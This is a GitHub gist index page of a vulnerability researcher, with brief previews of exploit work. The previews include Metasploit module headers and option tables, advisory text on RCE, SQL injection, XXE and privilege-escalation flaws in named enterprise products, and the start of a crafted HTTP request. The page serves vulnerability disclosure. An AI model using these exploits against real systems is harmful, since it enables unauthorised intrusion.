brandonprry
/ gist:f83917e0fcc3bf3ccd6b
Last active
August 29, 2015 14:16
Raritan PowerIQ 4.1/4.2/4.3 known session secret unauthenticated RCE
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| msf exploit(rails_secret_deserialization) > show options | |
| Module options (exploit/multi/http/rails_secret_deserialization): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| COOKIE_NAME no The name of the session cookie | |
| DIGEST_NAME SHA1 yes The digest t |
brandonprry
/ phpmoadmin_rce.rb
Last active
August 29, 2015 14:16
Quick metasploit module for possible phpMoAdmin 0day
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## | |
| # This module requires Metasploit: http//metasploit.com/download | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| require 'rex' | |
| require 'rexml/document' | |
| class Metasploit4 < Msf::Exploit::Remote |
brandonprry
/ wtreef
Created
February 20, 2015 17:01
Small BST solver for contest at work. I think I cheated.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Submitted by: Brandon Perry | |
| // wtreef.cpp : Defines the entry point for the console application. | |
| // | |
| //Quick run: | |
| /* | |
| brandon.perry@BRANPERRY-X64 ~ | |
| $ time '/cygdrive/c/Users/brandon.perry/Documents/Visual Studio 2013/Projects/wtreef/Release/wtreef.exe' | |
| Created a valid binary tree, but invalid BST. The tree was fixed and verified for 10 nodes. | |
| Created a valid binary tree, but invalid BST. The tree was fixed and verified for 2010 nodes. |
brandonprry
/ gist:939bb8e969a57301ffc3
Created
January 12, 2015 17:44
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Module options (auxiliary/gather/wp_photogallery_users_sqli): | |
| Name Current Setting Required Description | |
| ---- --------------- -------- ----------- | |
| GALLERYID no Gallery ID to use. If not provided, the module will attempt to bruteforce one. | |
| Proxies no Use a proxy chain | |
| RHOST 172.31.16.30 yes The target address | |
| RPORT 80 yes The target port | |
| TARGETURI /wordpress yes Relative URI of Wordpress installation | |
| VHOST no HTTP server virtual host |
brandonprry
/ gist:692e553975bf29aeaf2c
Last active
August 29, 2015 14:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| =begin | |
| McAfee ePolicy Orchestrator Authenticated XXE and Credential Disclosure | |
| Trial available here: | |
| https://secure.mcafee.com/apps/downloads/free-evaluations/survey.aspx?mktg=ESD1172&cid=ESD1172&eval=A0C692FB-8E29-4D47-BBF1-43CAB5F10069®ion=us | |
| McAfee ePolicy Orchestrator suffers from an authenticated XXE vulnerability, available to any authenticated user. The Server Task Log option in the upper left menu is where the vulnerability lies. When creating a custom filter, a bit of XML is passed from the client to the server to create the said filter. This parameter is called 'conditionXML' and is vulnerable to an XXE attack. The attack seems a bit limited however, as you can only fit up to 255 characters in the 'value' field. | |
| However, a file in the web server installation configuration directory called 'keystore.properties' is less than the size we need, and contains an encrypted passphrase that is set during installation. When installing, an initial admin user is created (with 'admin' as the default userna |
brandonprry
/ gist:396aa6eda74a5aaa19ac
Last active
August 29, 2015 14:08
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mulesoft ESB Runtime 3.5.1 Authenticated Privilege Escalation → Remote Code Execution | |
| Mulesoft ESB Runtime 3.5.1 allows any arbitrary authenticated user to create an administrator user due to a lack of permissions check in the handler/securityService.rpc endpoint. The following HTTP request can be made by any authenticated user, even those with a single role of Monitor. | |
| POST /mmc-3.5.1/handler/securityService.rpc HTTP/1.1 | |
| Host: 192.168.0.22:8585 | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 |
brandonprry
/ gist:c13e77204d9a8389fee4
Created
October 2, 2014 13:13
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require 'rubygems' | |
| require 'nexpose' | |
| require 'msfrpc-client' | |
| nx_host = 'nxhost' | |
| nx_port = 3780 | |
| nx_user = 'nxadmin' | |
| nx_pass = 'nxpassword' | |
| msf_host = 'msfprohost' |
brandonprry
/ gist:a65b785929018f95940e
Created
September 7, 2014 00:33
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| brandons-imac:tmp bperry$ ruby alexa_test.rb | |
| aliexpress.com acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| wordpress.org acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| gmw.cn acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| godaddy.com acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| kickass.to acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| fiverr.com acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| ameblo.jp acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| secureserver.net acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header | |
| weather.com acts differently with sqlmap vs ie/chrome header and acts differently than the iphone header |
brandonprry
/ scrutinizer_changeunit_sqli_exec.rb
Created
July 10, 2014 16:16
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This module requires Metasploit: http//metasploit.com/download | |
| ## | |
| # Current source: https://github.com/rapid7/metasploit-framework | |
| ## | |
| require 'msf/core' | |
| class Metasploit3 < Msf::Exploit::Remote | |
| Rank = ExcellentRanking |
brandonprry
/ gist:36b4b8df1cde279a9305
Created
July 10, 2014 16:12
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Dell Scrutinizer 11.01 several vulnerabilities | |
| http://www.mysonicwall.com has a trial available. | |
| Dell Sonicwall Scrutinizer suffers from several SQL injections, many of which can end up with | |
| remote code execution. An attacker needs to be authenticated, but not as an administrator. | |
| However, that wouldn’t stop anyone since there is also a privilege escalation vulnerability in that | |
| any authenticated user can change any other user’s password, including the admin. One SQL | |
| injection, which a Metasploit module was provided for, requires this privilege escalation to reach | |
| since it exists in the new user mechanism only available to admins. |